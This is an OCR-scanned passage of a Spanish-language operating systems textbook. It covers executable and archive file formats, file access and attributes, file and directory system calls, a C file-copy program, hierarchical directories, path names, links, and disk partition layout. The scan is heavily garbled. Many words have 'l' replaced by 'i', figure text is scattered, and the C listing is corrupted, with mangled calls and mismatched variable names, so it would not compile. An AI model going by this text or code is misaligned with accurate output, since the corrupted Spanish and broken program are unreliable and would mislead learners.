bandera. Después dei encabezado están ei texto y ios datos dei programa en sí. Éstos se cargan en 
memoria y se reubican usando ios bits de reubicación. La tabia de símboios se utiiiza para depurar. 


o 

■a 

(O 

N 

CU 

n 


Número mágico 


Encabezado 

Tamaño del texto 


Tamaño de los datos 



Tamaño del BSS 


Módulo 

objeto 

Tamaño de la tabla 
de símbolos 


Punto de entrada 



mmmm 



Banderas 


Encabezado 



i Texto ; 


Módulo 

objeto 



i Datos ; 


Encabezado 

Bits de reubicaclón , 

: 

Módulo 

objeto 

Tabla de 
símbolos 



Nombre del 
módulo 


Datos 


Propietario 


Protección 


Tamaño 


(a) (b) 

Figura 4-3. (a) U n archivo ejecutable, (b) U n archivo. 


Nuestro segundo ejempio de un archivo binario es un archivo, también de UNIX. Consiste en 
una coiección de procedimientos (móduios) de bibiioteca compiiados, pero no eniazados. A cada 
uno se ie antepone un encabezado que indica su nombre, fecha de creación, propietario, código de 
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protección y tamaño. AI igual que en el caso del archivo ejecutable, los encabezados de los módu¬ 
los están llenos de números binarios. Al copiarlos a la impresora se produciría basura como salida. 

Cada sistema operativo debe reconocer por lo menos un tipo de archivo — su propio archivo 
ejecutable— y algunos reconocen más. El antiguo sistemaTOPS-20 (para el DECsystem 20) hacía 
algo más, ya que examinaba la hora de creación de cualquier archivo a ejecutar. Después localiza¬ 
ba el archivo de código fuente y veía si éste se había modificado desde la última vez que se creó el 
binario. Si así era, recompilaba automáticamente el código fuente. En términos de UNIX, el pro¬ 
grama make había sido integrado al shell. Las extensiones de archivo eran obligatorias, por lo que 
el sistema operativo podía saber cuál programa binario se derivaba de cuál fuente. 

Tener archivos fuertemente tipificados como éstos ocasiona problemas cada vez que el usuario 
hace algo que los diseñadores del sistema no esperaban. Por ejemplo, considere un sistema en el que 
los archivos de salida de un programa tienen la extensión .dat (archivos de datos). Si un usuario es¬ 
cribe un programa formateador que lea un archivo .c (programa de C), lo transforma (por ejemplo, 
convirtiéndolo a un esquema de sangría estándar) y después escribe el archivo transformado como 
salida, el archivo de sal ida será de tipo .dat. Si el usuario trata de ofrecer esto al compilador de C pa¬ 
ra que lo compile, el sistema se rehusará debido a que tienen la extensión incorrecta. Los intentos de 
copiar archivo.dat a archivo.c serán rechazados por el sistema como inválidos (para proteger al usua¬ 
rio contra los errores). 

M i entras que este tipo de "amabilidad con el usuario" puede ayudar a los novatos, vuelve lo¬ 
cos a los usuarios experimentados debido a que tienen que dedicar un esfuerzo considerable para 
sortear la idea del sistema operativo en cuanto a lo que es razonable y lo que no. 

4.1.4 Acceso a archivos 

Los primeros sistemas operativos proporcionaban sólo un tipo de acceso: acceso secuencial. En es¬ 
tos sistemas, un proceso podía leer todos los bytes o registros en un archivo en orden, empezando 
desde el principio, pero no podía saltar algunos y leerlos fuera de orden. Sin embargo, los archivos 
secuenciales podían rebobinarse para poder leerlos todas las veces que fuera necesario. Los archi¬ 
vos secuenciales eran convenientes cuando el medio de almacenamiento era cinta magnética en vez 
de disco. 

Cuando se empezó a usar discos para almacenar archivos, se hizo posible leer los bytes o re¬ 
gistros de un archivo fuera de orden, podiendo acceder a los registros por llave en vez de posición. 
Los archivos cuyos bytes o registros se pueden leer en cualquier orden se llaman archivos de ac¬ 
ceso aleatorio. Son requeridos por muchas aplicaciones. 

Los archivos de acceso aleatorio son esenciales para muchas aplicaciones, como los sistemas 
de bases de datos. Si el cliente de una aerolínea llama y desea reservar un asiento en un vuelo es¬ 
pecífico, el programa de reservación debe poder tener acceso al registro para ese vuelo sin tener que 
leer primero los miles de registros de otros vuelos. 

Es posible utilizar dos métodos para especificar dónde se debe empezar a leer. En el primero, 
cada operación read da la posición en el archivo en la que se va a empezar a leer. En el segundo se 
provee una operación especial (seek) para establecer la posición actual. Después de una operación 
seek, el archivo se puede leer de manera secuencial desde la posición actual. Este último método 
se utiliza en UNIX y Windows. 
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4.1.5 Atributos de archivos 

Todo archivo tiene un nombre y sus datos. Además, todos ios sistemas operativos asocian otra in¬ 
formación con cada archivo: por ejempio, ia fecha y hora de ia úitima modificación dei archivo y 
su tamaño. A estos dementas adicionaies Íes iiamaremos atributos dei archivo. A igunas personas 
ios iiaman metadatos. La iista de atributos varía considerabiemente de un sistema a otro. La tabia 
de ia figura 4-4 muestra aigunas de ias posibiiidades, pero existen otras. Ningún sistema existente 
tiene todos, pero cada uno de dios está presente en aigún sistema. 


Atributo 

Significado 

Protección 

Quién puede acceso ai archivo y en qué forma 

Contraseña 

Contraseña necesaria para acceder ai archivo 

Creador 

ID de ia persona que creó ei archivo 

Propietario 

Ei propietario actuai 

Bandera de sóio iectura 

0 para iectura/escritura; 1 para sóio iectura 

Bandera ocuito 

0 para normai; 1 para que no aparezca en ios iistados 

Bandera dei sistema 

0 para archivos normaies; 1 para archivo dei sistema 

Bandera de archivo 

0 si ha sido respaidado; 1 si necesita respaidarse 

Bandera ASCII/binario 

0 para archivo ASCII; 1 para archivo binario 

Bandera de acceso aieatorio 

0 para sóio acceso secuenciai; 1 para acceso aieatorio 

Bandera temporai 

0 para normai; 1 para eiiminar archivo ai saiir dei proceso 

Banderas de bioqueo 

0 para desbioqueado; distinto de cero para bioqueado 

Longitud de registro 

Número de bytes en un registro 

Posición de ia iiave 

Despiazamiento de ia iiave dentro de cada registro 

Longitud de ia iiave 

Número de bytes en ei campo iiave 

Hora de creación 

Fecha y hora en que se creó ei archivo 

Hora dei úitimo acceso 

Fecha y hora en que se accedió ai archivo por úitima vez 

Hora de ia úitima modificación 

Fecha y hora en que se modificó por úitima vez ei archivo 

Tamaño actuai 

Número de bytes en ei archivo 

Tamaño máximo 

Número de bytes hasta donde puede crecer ei archivo 


Figura 4-4. Algunos posibles atributos de archivos. 


Los primeros cuatro atributos se reiacionan con ia protección dei archivo e indican quién pue¬ 
de acceder a d y quién no. Todos ios tipos de esquemas son posibies, aigunosdeioscuaies estudia¬ 
remos más adeiante. En aigunos sistemas, ei usuario debe presentar una contraseña para acceder a 
un archivo, en cuyo caso ia contraseña debe ser uno de ios atributos. 

Las banderas son bits o campos cortos que controian o habiiitan cierta propiedad específica. 
Por ejempio, ios archivos ocuitos no aparecen en ios iistados de todos ios archivos. La bandera de 
archivo es un bit que iieva ei registro de si ei archivo se ha respaidado recientemente. Ei programa 
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de respaldo lo desactiva y el sistema operativo lo activa cada vez que se modifica un archivo. De 
esta forma, el programa de respaldo puede indicar qué archivos necesitan respaldarse. La bandera 
temporal permite marcar un archivo para la eliminación automática cuando el proceso que lo creó 
termina. 

Los campos longitud de registro, posición de llave y longitud de llave sólo están presentes en 
los archivos en cuyos registros se pueden realizar búsquedas mediante el uso de una llave. Ellos pro¬ 
porcionan la información requerida para buscar las llaves. 

Los diversos tiempos llevan la cuenta de cuándo se creó el archivo, su acceso y su modifica¬ 
ción más recientes. Éstos son útiles para una variedad de propósitos. Por ejemplo, un archivo de 
código fuente que se ha modificado después de la creación del archivo de código objeto corres¬ 
pondiente necesita volver a compilarse. Estos campos proporcionan la información necesaria. 

El tamaño actual indica qué tan grande es el archivo en el presente. A Igunos sistemas operati¬ 
vos de computadoras mainframe antiguas requieren que se especifique el tamaño máximo a la ho¬ 
ra de crear el archivo, para poder permitir que el sistema operativo reserve la cantidad máxima de 
almacenamiento de antemano. Los sistemas operativos de estaciones de trabajo y computadoras 
personales son lo bastante inteligentes como para arreglárselas sin esta característica. 


4.1.6 O peraciones de archivos 

Los archivos existen para almacenar información y permitir que se recupere posteriormente. Dis¬ 
tintos sistemas proveen diferentes operaciones para permitir el almacenamiento y la recuperación. 
A continuación se muestra un análisis de las llamadas al sistema más comunes relacionadas con los 
archivos. 

1. create. El archivo se crea sin datos. El propósito de la llamada es anunciar la llegada del 
archivo y establecer algunos de sus atributos. 

2. Deiete. Cuando el archivo ya no se necesita, se tiene que eliminar para liberar espacio en 
el disco. Siempre hay una llamada al sistema para este propósito. 

3. open. Antes de usar un archivo, un proceso debe abrirlo. El propósito de la llamada a open 
es permitir que el sistema lleve los atributos y la lista de direcciones de disco a memoria 
principal para tener un acceso rápido a estos datos en llamadas posteriores. 

4. cióse. Cuando terminan todos los accesos, los atributos y las direcciones de disco ya no son 
necesarias, por lo que el archivo se debe cerrar para liberar espacio en la tabla interna. M u- 
chos sistemas fomentan esto al imponer un número máximo de archivos abiertos en los pro¬ 
ceso. Un disco se escribe en bloques y al cerrar un archivo se obliga a escribir el último 
bloque del archivo, incluso aunque ese bloque no esté lleno todavía. 

5. Read. Los datos se leen del archivo. Por lo general, los bytes provienen de la posición ac¬ 
tual. El llamador debe especificar cuántos datos se necesitan y también debe proporcionar 
un búfer para colocarlos. 
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6. write. Los datos se escriben en el archivo otra vez, por lo general en la posición actual. 
Si la posición actual es al final del archivo, aumenta su tamaño. Si la posición actual está 
en medio del archivo, los datos existentes se sobrescriben y se pierden para siempre. 

7. Append. Esta llamada es una forma restringida de write. Sólo puede agregar datos al final 
del archivo. Los sistemas que proveen un conjunto mínimo de llamadas al sistema por lo 
general no tienen append; otros muchos sistemas proveen varias formas de realizar la mis¬ 
ma acción y algunas veces ésos tienen append. 

8. seek. Para los archivos de acceso aleatorio, se necesita un método para especificar de dón¬ 
de se van a tomar los datos. U na aproximación común es una llamada al sistema de nom¬ 
bre seek, la cual reposiciona el apuntador del archivo en una posición específica del 
archivo. Una vez que se completa esta llamada, se pueden leer o escribir datos en esa po¬ 
sición. 

9. Get attributes. A menudo, los procesos necesitan leer los atributos de un archivo para 
realizar su trabajo. Por ejemplo, el programa make de UNIX se utiliza con frecuencia pa¬ 
ra administrar proyectos de desarrollo de software que consisten en muchos archivos fuen¬ 
te. Cuando se llama a make, este programa examina los tiempos de modificación de todos 
los archivos fuente y objeto, con los que calcula el mínimo número de compilaciones re¬ 
queridas para tener todo actualizado. Para hacer su trabajo, debe analizar los atributos, a 
saber, los tiempos de modificación. 

10. Set attnibutes. A Igunos de I OS atributos puede establecerlos el usuario y se pueden mo¬ 
dificar después de haber creado el archivo. Esta llamada al sistema hace eso posible. La in¬ 
formación del modo de protección es un ejemplo obvio. La mayoría de las banderas 
también caen en esta categoría. 

11. Rename. Con frecuencia ocurre que un usuario necesita cambiar el nombre de un archivo 
existente. Esta llamada al sistema lo hace posible. No siempre es estrictamente necesaria, 
debido a que el archivo por lo general se puede copiar en un nuevo archivo con el nuevo 
nombre, eliminando después el archivo anterior. 


4.1.7 Un programa de ejemplo que utiliza llamadas al sistema de archivos 

En esta sección examinaremos un programa simple de UNIX que copia un archivo de su archivo 
fuente a un archivo destino. Su listado se muestra en la figura 4-5. El programa tiene una mínima 
funcionalidad y un reporte de errores aún peor, pero nos da una idea razonable acerca de cómo fun¬ 
cionan algunas de las llamadas al sistema relacionadas con archivos. 

Por ejemplo, el programa copyfile se puede llamar mediante la línea de comandos 

copyfile abe xyz 

para copiar el archivo abe a xyz. Si xyz ya existe, se sobrescribirá. En caso contrario, se creará. 
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/* Programa para copiar archivos. La verificación y ei reporte de errores son mínimos. *! 


#inciude <sys/types.h> 
#inciude <fcnti.h> 
#inciude <stdiib.h> 
#inciude <unistd.h> 


/* inciuye ios archivos de encabezado necesarios * 


int mainfint argc, char *argv[]); 


/* prototipo ANSI *! 


#defineTAM_BUF 4096 
#defineMODO SALIDA 0700 


!* usa un tamaño de búfer de 4096 bytes */ 

I* bits de protección para ei archivo de saiida */ 


int mainfint argc, char *argv[]) 

{ 

intent_da, sai_da, ieer_cuenta, escribir_cuenta: 
char bufer[TAM_BLIF]; 


if (argc 1=3) exitfl); 


/* error de sintaxis si argc no es 3 */ 


Abre ei archivo de entrada v crea ei archivo de saiida 


ent_da = open{argv[l], 0_RDONLY); 
if (ent_da < 0) exit{2); 
sai_da = creat{argv[2], MODO_SALIDA); 
if {sai_da < 0) exit{3); 


/* abre ei archivo fuente */ 

/* si no se puede abrir, termina */ 
/* crea ei archivo de destino *! 

I* si no se puede crear, termina *1 


/* Cicio de copia */ 
whiie (TRUE) { 

ieer_cuenta = read{ent_da,bufer,TAM_BUF); /* iee un bioque de datos *1 
if (iee_cuenta <= 0) break; I* si iiega ai fin de archivo o hay un error, saie dei cicio *1 

escribe_cuenta =write(sai_da,bufer,iee_cuenta);/* escribe ios datos *1 
if (escribe_cuenta <= 0) exit{4); I* escribe_cuenta <= 0 es un error *1 


I* Cierra ios archivos */ 

ciose{ent_da); 

ciose{sai_da); 

if (iee_cuenta==0) I* no hubo error en ia úitima iectura *1 

exitfO); 
eise 

exit{5); I* hubo error en ia úitima iectura *1 


Figura 4-5. U n programa simple para copiar un archivo. 


El programa debe llamarse con exactamente dos argumentos, ambos nombres de archivo válidos. El 
primero es el archivo fuente, el segundo es el de salida. 

Las cuatro instrucciones #include iniciales hacen que se incluya una gran cantidad de defini¬ 
ciones y prototipos de funciones en el programa. Esto es necesario para hacer el programa confor¬ 
me a los estándares internacionales relevantes, pero no nos ocuparemos más de ello. La siguiente 
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línea es un prototipo defunción para main, aigo requerido por ANSI C, pero que tampoco es im¬ 
portante para nuestros fines. 

La primera instrucción #define es una definición de macro que define ia cadena de caracteres 
TAM_BUF como una macro que se expande en ei número 4096. Ei programa ieerá y escribirá en 
trozos de 4096 bytes. Se considera una buena práctica de programación dar nombres a ias constan¬ 
tes como ésta y utiiizar ios nombres en vez de ias constantes. Esta convención no sóio faciiita que 
ios programas sean fáciies de ieer, sino también su mantenimiento. La segunda instrucción #define 
determina quién puede acceder ai archivo de saiida. 

Ei programa principai se iiama main y tiene dos argumentos: argc y argv. Ei sistema operati¬ 
vo suministra estos argumentos cuando se hace una i i amada ai programa. Ei primero indica cuán¬ 
tas cadenas estaban presentes en ia iínea de comandos que invocó ai programa, inciuyendo su 
nombre. Debe ser 3. Ei segundo es un arregio de apuntadores a ios argumentos. En ia iiamada de 
ejempio anterior, ios dementas de este arregio contienen apuntadores a ios siguientes vaiores: 

argv[0] = "copyfile" 

argv[l] = "abe" 

argv[2] = "xyz" 

Es mediante este arregio que ei programa tiene acceso a sus argumentos. 

Se deciaran cinco variabies. Las primeras dos, ent_da y sal_da, contienen ios descriptores de 
archivos: pequeños enteros que se devueiven cuando se abre un archivo. Los siguientes dos, ieer- 
_cuenta y escribir_cuenta, son ias cuentas de bytes que devueiven ias ñamadas ai sistema read y 
write, respectivamente. La úitima variabie, bufer, es ei búfer que se utiiiza para guardar ios datos 
ieídosy suministrar ios datos que se van a escribir. 

La primera instrucción verifica argc para ver si es 3. Si no, termina con ei código de estado 1. 
Cuaiquier código de estado distinto deO indica que ocurrió un error. Ei código de estado es ei úni¬ 
co modo de reportar errores en este programa. Una versión de producción por io generai también 
imprime mensajes de error. 

Después tratamos de abrir ei archivo fuente y crear ei archivo de destino. Si ei archivo fuente 
se abre con éxito, ei sistema asigna un pequeño entero a ent_da, para identificar ei archivo. Las ña¬ 
madas siguientes deben inciuir este entero, de manera que ei sistema sepa qué archivo desea. De 
manera simiiar, si ei archivo de destino se crea satisfactoriamente, sai_da recibe un vaior para iden¬ 
tificado. Ei segundo argumento para creat estabieceei modo de protección. Si faña ia apertura o ia 
creación de ios archivos, ei descriptor de archivo correspondiente se estabiece en -1 y ei progra¬ 
ma termina con un código de error. 

Ahora viene ei cicio de copia. Empieza tratando de ieer 4 KB de datos ai bufer. Para eiio hace 
una iiamada ai procedimiento de bibiioteca read, que en reaiidad invoca ia iiamada ai sistema read. 
Ei primer parámetro identifica ai archivo, ei segundo proporciona ei búfer y ei tercero indica cuán¬ 
tos bytes se deben ieer. Ei vaior asignado a ieer_cuenta indica ei número de bytes ieídos. Por io ge¬ 
nerai este número es 4096, excepto si en ei archivo quedan menos bytes. Cuando se haya aicanzado 
ei fin dei archivo, será 0. Si aiguna vez ieer_cuenta es cero o negativo, ei proceso de copia no pue¬ 
de continuar, ejecutándose ia instrucción break para terminar ei cicio (que de otra manera no ten¬ 
dría fin). 
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La llamada a write envía el búfer al archivo de destino. Ei primer parámetro identifica ai archi¬ 
vo, ei segundo da ei bufer y ei tercero indica cuántos bytes se deben escribir, en forma anáioga a 
read. Observe que ia cuenta de bytes es ei número de bytes ieídos, noTAM_BU F. Este punto es im¬ 
portante, debido a que ia úitima iectura no devoiverá 4096 a menos que ei archivo sea un múitipio 
de4 KB. 

Cuando se haya procesado todo ei archivo, ia primera iiamada más aiiá dei finai dei archivo re¬ 
gresará 0 a ieer_cuenta, io cuai hará que saiga dei cicio. En este punto se cierran ios dos archivos 
y ei programa termina con un estado que indica i a terminación normai. 

Aunque ias iiamadas ai sistema de Windows son diferentes de ias de UN IX, la estructura ge¬ 
neral de un programa de Windows de línea de comandos para copiar un archivo es moderadamen¬ 
te similar al de la figura 4-5. En el capítulo 11 examinaremos las llamadas a Windows Vista. 


4.2 DIRECTORIOS 

Para llevar el registro de los archivos, los sistemas de archivos por lo general tienen directorios o 
carpetas, que en muchos sistemas son también archivos. En esta sección hablaremos sobre los di¬ 
rectorios, su organización, sus propiedades y las operaciones que pueden realizarse con ellos. 


4.2.1 Sistemas de directorios de un solo nivel 

La forma más simple de un sistema de directorios es tener un directorio que contenga todos los 
archivos. A Igunas veces se le llama directorio raíz, pero como es el único, el nombre no impor¬ 
ta mucho. En las primeras computadoras personales, este sistema era común, en parte debido a 
que sólo había un usuario. Como dato interesante, la primera supercomputadora del mundo (CDC 
6600) también tenía un solo directorio para todos los archivos, incluso cuando era utilizada por 
muchos usuarios a la vez. Esta decisión sin duda se hizo para mantener simple el diseño del soft¬ 
ware. 

En la figura 4-6 se muestra un ejemplo de un sistema con un directorio. Aquí el directorio con¬ 
tiene cuatro archivos. Las ventajas de este esquema son su simpleza y la habilidad de localizar ar¬ 
chivos con rapidez; después de todo, sólo hay un lugar en dónde buscar. A menudo se utiliza en 
dispositivos incrustados simples como teléfonos, cámaras digitales y algunos reproductores de mú¬ 
sica portátiles. 


4.2.2 Sistemas de directorios jerárquicos 

Tener un solo nivel es adecuado para aplicaciones dedicadas simples (e incluso se utilizaba en las 
primeras computadoras personales), pero para los usuarios modernos con miles de archivos, sería 
imposible encontrar algo si todos los archivos estuvieran en un solo directorio. 
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-^Directorio raíz 



Figura 4-6. U n sistema de directorio de un soio nivei que contiene cuatro archivos. 

En consecuencia, se necesita una forma de agrupar los archivos relacionados. Por ejemplo, un 
profesor podría tener una colección de archivos que en conjunto formen un libro que está escribien¬ 
do para un curso, una segunda colección de archivos que contienen programas enviados por los es¬ 
tudiantes para otro curso, un tercer grupo de archivos que contenga el código de un sistema de 
escritura de compiladores avanzado que está construyendo, un cuarto grupo de archivos que contie¬ 
nen proposiciones de becas, así como otros archivos para correo electrónico, minutas de reuniones, 
artículos que está escribiendo, juegos, etcétera. 

Lo que se necesita es una jerarquía (es decir, un árbol de directorios). Con este esquema, pue¬ 
de haber tantos directorios como se necesite para agrupar los archivos en formas naturales. Además, 
si varios usuarios comparten un servidor de archivos común, como se da el caso en muchas redes 
de empresas, cada usuario puede tener un directorio raíz privado para su propia jerarquía. Este es¬ 
quema se muestra en la figura 4-7. Aquí, cada uno de los directorios A, B y C contenidos en el di¬ 
rectorio raíz pertenecen a un usuario distinto, dos de los cuales han creado subdirectorios para 
proyectos en los que están trabajando. 



Archivo de usuario 


Figura 4-7. U n sistema de directorios jerárquico. 

La capacidad de los usuarios para crear un número arbitrario de subdirectorios provee una po¬ 
derosa herramienta de estructuración para que los usuarios organicen su trabajo. Por esta razón, ca¬ 
si todos los sistemas de archivos modernos se organizan de esta manera. 

4.2.3 Nombres de rutas 

Cuando el sistema de archivos está organizado como un árbol de directorios, se necesita cierta for¬ 
ma de especificar los nombres de los archivos. Por lo general se utilizan dos métodos distintos. En 
el primer método, cada archivo recibe un nombre de ruta absoluto que consiste en la ruta desde 
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el directorio raíz ai archivo. Como ejempio, ia ruta /usr/ast/maiibox significa que ei directorio raíz 
contiene un subdirectorio iiamado usr, que a su vez contiene un subdirectorio ast, ei cuai contiene ei 
archivo maiibox. Los nombres de ruta absoiutos siempre empiezan en ei directorio raíz y son únicos. 
En UNIX, ios componentes de ia ruta van separados por/. En Windows ei separador es\. En M UL- 
TICS era >. Así, ei mismo nombre de ruta se escribiría de ia siguiente manera en estos tres sistemas: 

Windows \usr\ast\mailbox 

UNIX /usr/ast/mailbox 

MULTICS >usr>ast>mailbox 

Sin importar cuái carácter se utiiice, si ei primer carácter dei nombre de ia ruta es ei separador, en¬ 
tonces i a ruta es absoiuta. 

Ei otro tipo de nombre es ei nombre de ruta relativa. Éste se utiiiza en conjunto con ei con¬ 
cepto dei directorio de trabajo (también iiamado directorio actual). Un usuario puede designar 
un directorio como ei directorio de trabajo actuai, en cuyo caso todos ios nombres de ias rutas que 
no empiecen en ei directorio raíz se toman en forma reiativa ai directorio de trabajo. Por ejempio, 
si ei directorio de trabajo actuai es/usr/ast, entonces ei archivo cuya ruta absoiuta sea/usr/ast/maii¬ 
box se puede referenciar simpiemente como maiibox. En otras paiabras, ei comando de UNIX 

cp /usr/ast/mailbox /usr/ast/mailbox.bak 
y el comando 

cp maiibox maiibox.bak 

hacen exactamente lo mismo si el directorio de trabajo es/usr/ast. A menudees más conveniente la 
forma relativa, pero hace lo mismo que la forma absoluta. 

Algunos programas necesitan acceder a un archivo específico sin importar cuál sea el directo¬ 
rio de trabajo. En ese caso, siempre deben utilizar nombres de rutas absolutas. Por ejemplo, un co¬ 
rrector ortográfico podría necesitar leer/usr/lib/dictionary para realizar su trabajo. Debe utilizar el 
nombre de la ruta absoluta completo en este caso, ya que no sabe cuál será el directorio de trabajo 
cuando sea llamado. El nombre de la ruta absoluta siempre funcionará, sin importar cuál sea el di¬ 
rectorio de trabajo. 

Desde luego que, si el corrector ortográfico necesita un gran número de archivos de/usr/lib, un 
esquema alternativo es que emita una llamada al sistema para cambiar su directorio de trabajo a 
/usr/lib y que después utilice dictionary como el primer parámetro para open. Al cambiar en forma 
explícita el directorio de trabajo, sabe con certeza dónde se encuentra en el árbol de directorios, pa¬ 
ra poder entonces usar rutas relativas. 

Cada proceso tiene su propio directorio de trabajo, por lo que cuando éste cambia y después 
termina ningún otro proceso se ve afectado y no quedan rastros del cambio en el sistema de archi¬ 
vos. De esta forma, siempre es perfectamente seguro para un proceso cambiar su directorio de tra¬ 
bajo cada vez que sea conveniente. Por otro lado, si un procedimiento de biblioteca cambia el 
directorio de trabajo y no lo devuelve a su valor original cuando termina, el resto del programa tal 
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vez no funcione, ya que el supuesto directorio de trabajo que debería tener ahora podría ser inváli¬ 
do. Por esta razón, los procedimientos de biblioteca raras veces cambian el directorio de trabajo y 
cuando deben hacerlo siempre lo devuelven a su posición original antes de regresar. 

La mayoría de los sistemas operativos que proporcionan un sistema de directorios jerárquico 
tienen dos entradas especiales en cada directorio:y que por lo general se pronuncian "pun¬ 
to" y "puntopunto". Punto se refiere al directorio actual; puntopunto se refiere a su padre (excepto 
en el directorio raíz, donde se refiere a sí mismo). Para ver cómo se utilizan estas entradas especia¬ 
les, considere el árbol de archivos de UNIX en la figura 4-8. Cierto proceso tiene a/usr/ast como 
su directorio de trabajo. Puede utilizar., para subir en el árbol. Por ejemplo, puede copiar el archi¬ 
vo /usr/lib/dictionary a su propio directorio mediante el comando 

cp ../lib/dictionary . 

Laprimera ruta instruye al sistema que vaya hacia arriba (al directorio usr) y después bajeal direc¬ 
torio lib para encontrar el archivo dictionary. 


/ 



El segundo argumento (punto) nombra el directorio actual. Cuando el comando cp obtiene un 
nombre de directorio (incluyendo punto) como su último argumento, copia todos los archivos a ese 
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directorio. Desde iuego que una forma más normai de reaiizar ia copia sería utiiizar ei nombre de 
ruta absoiuta compieto dei archivo de origen: 

cp /usr/lib/dictionary . 

Aquí ei uso de punto ahorra ai usuario ia moiestia de escribir dictionary una segunda vez. Sin em¬ 
bargo, también funciona escribir 

cp /usr/lib/dictionary dictionary 

ai iguai que 

cp /usr/lib/dictionary /usr/ast/dictionary 
Todos estos comandos reaiizan exactamente io mismo. 


4.2.4 O peraciones de directorios 

Las iiamadas ai sistema permitidas para administrar directorios exhiben más variación de un siste¬ 
ma a otro que ias iiamadas ai sistema para ios archivos. Para dar una impresión de io que son y có¬ 
mo funcionan, daremos un ejempio (tomado de U NIX). 

1. create. Se crea un directorio. Está vacío, excepto por punto y puntopunto, que ei sistema 
coi oca ahí de manera automática (o en unos cuantos casos io hace ei programa mkdir). 

2. Delate. Se eiimina un directorio. Se puede eiiminar sóio un directorio vacío. Un directorio 
que sóio contiene a punto y puntopunto se considera vacío, ya que por io generai éstos no 
se pueden eiiminar. 

3. opendir. Los directorios se pueden ieer. Por ejempio, para iistar todos ios archivos en un 
directorio, un programa de iistado abre ei directorio para ieer ios nombres de todos ios ar¬ 
chivos que contiene. Antes de poder ieer un directorio se debe abrir, en forma anáioga ai 
proceso de abrir y ieer un archivo. 

4. ciosedir. Cuando se ha ieído un directorio, se debe cerrar para iiberar espacio en ia tabia 
interna. 

5. Readdin. Esta iiamada devueive ia siguiente entrada en un directorio abierto. A ntes era po- 
sibie ieer directorios utiiizando ia iiamada ai sistema read común, pero ese método tiene ia 
desventaja de forzar ai programador a conocer y tratar con ia estructura i nterna de ios di rec- 
torios. En contraste, readdir siempre devueive una entrada en formato estándar, sin impor¬ 
tar cuái de ias posibies estructuras de directorio se utiiice. 

6. Rename. En muchos aspectos, ios directorios son sóio como archivos y se Íes puede cam¬ 
biar ie nombre de ia misma forma que a ios archivos. 

7. Link. La vincuiación (iigado) es una técnica que permite a un archivo aparecer en más de 
un directorio. Esta iiamada ai sistema especifica un archivo existente y ei nombre de una ru¬ 
ta, creando un víncuio desde ei archivo existente hasta ei nombre especificado por ia ruta. 
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De esta forma, el mismo archivo puede aparecer en varios directorios. A un víncuio de es¬ 
te tipo, que incrementa ei contador en ei nodo-i dei archivo (para iievar ia cuenta dei núme¬ 
ro de entradas en ei directorio que contienen ei archivo), se ie iiama aigunas veces vínculo 
duro (o liga dura). 

8. uniink. Se eiimina una entrada de directorio. Si ei archivo que se va a desvincuiar sóio es¬ 
tá presente en un directorio (ei caso normai), se quita dei sistema de archivos. Si está pre¬ 
sente en varios directorios, se eiimina sóio ei nombre de ruta especificado. Los demás 
permanecen. En UNIX, la llamada al sistema para eliminar archivos (que vimos antes) es, 
de hecho, uniink. 


La lista anterior contiene las llamadas más importantes, pero hay unas cuantas más; por ejemplo, 
para administrar la información de protección asociada con un directorio. 

Una variante sobre la idea de vincular archivos es el vínculo simbólico (liga simbólica). En 
vez de tener dos nombres que apunten a la misma estructura de datos interna que representa un ar¬ 
chivo, se puede crear un nombre que apunte a un pequeño archivo que nombre a otro. Cuando se 
utiliza el primer archivo, por ejemplo, abierto, el sistema de archivos sigue la ruta y busca el nom¬ 
bre al final. Después empieza el proceso de búsqueda otra vez, utilizando el nuevo nombre. Los víncu¬ 
los simbólicos tienen la ventaja de que pueden traspasar los límites de los discos e incluso nombrar 
archivos en computadoras remotas. Sin embargo, su implementación es poco menos eficiente que 
los vínculos duros. 

4.3 IMPLEMENTACIÓN DE SISTEMAS DE ARCHIVOS 

Ahora es el momento de cambiar del punto de vista que tiene el usuario acerca del sistema de ar¬ 
chivos, al punto de vista del que lo implementa. Los usuarios se preocupan acerca de cómo nom¬ 
brarlos archivos, qué operaciones se permiten en ellos, cuál es la apariencia del árbol de directorios 
y cuestiones similares de la interfaz. Los implementadores están interesados en la forma en que se 
almacenan los archivos y directorios, cómo se administra el espacio en el disco y cómo hacer que 
todo funcione con eficiencia y confiabilidad. En las siguientes secciones examinaremos varias de 
estas áreas para ver cuáles son los problemas y las concesiones que se deben hacer. 

4.3.1 Distribución del sistema de archivos 

Los sistemas de archivos se almacenan en discos. La mayoría de los discos se pueden dividir en una 
o más particiones, con sistemas de archivos independientes en cada partición. El sector 0 del disco 
se conoce como el MBR (M áster Boot Record; Registro maestro de arranque) y se utiliza para 
arrancar la computadora. El final del M BR contiene la tabla de particiones, la cual proporciona las 
direcciones de inicio y fin de cada partición. Una de las particiones en la tabla se marca como acti¬ 
va. Cuando se arranca la computadora, el BIOS leey ejecuta el M BR. Lo primero que hace el pro¬ 
grama MBR es localizar la partición activa, leer su primer bloque, conocido como bloque de 
arranque, y ejecutarlo. El programa en el bloque de arranque carga el sistema operativo contenido 
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en esa partición. Por cuestión de uniformidad, cada partición inicia con un bioque de arranque no 
contenga un sistema operativo que se pueda arrancar. Además, podría contener uno en ei futuro. 

Además de empezar con un bioque de arranque, ia distribución de una partición de disco varía 
mucho de un sistema de archivos a otro. A menudo ei sistema de archivos contendrá aigunos de ios 
ei ementas que se muestran en ia figura 4-9. Ei primero es ei superbioque. Contiene todos ios pa¬ 
rámetros ciave acerca dei sistema de archivos y se iee en ia memoria cuando se arranca ia compu¬ 
tadora o se entra en contacto con ei sistema de archivos por primera vez. La información típica en 
ei superbioque inciuye un número mágico para identificar ei tipo dei sistema de archivos, ei núme¬ 
ro de bioques que contiene ei sistema de archivos y otra información administrativa ciave. 

-< -Disco completo-► 


Tabla de particiones 

\ 




A continuación podría venir información acerca de ios bioques iibres en ei sistema de archivos, 
por ejempio en ia forma de un mapa de bits o una iista de apuntadores. Ésta podría ir seguida de ios 
nodos-i, un arregio de estructuras de datos, uno por archivo, que indica todo acerca dei archivo. 
Después de eso podría venir ei directorio raíz, que contiene ia parte superior dei árboi dei sistema 
de archivos. Por úitimo, ei resto dei disco contiene todos ios otros directorios y archivos. 

4.3.2 I mplementación de archivos 

Probabiemente ia cuestión más importante ai impiementar ei aimacenamiento de archivos sea man¬ 
tener un registro acerca de qué bioques de disco van con cuái archivo. Se utiiizan varios métodos 
en distintos sistemas operativos. En esta sección examinaremos unos cuantos de eiios. 

Asignación contigua 

Ei esquema de asignación más simpie es aimacenar cada archivo como una serie contigua de 
bioques de disco. Así, en un disco con bioques de 1 KB, a un archivo de 50 KB se ie asignarían 
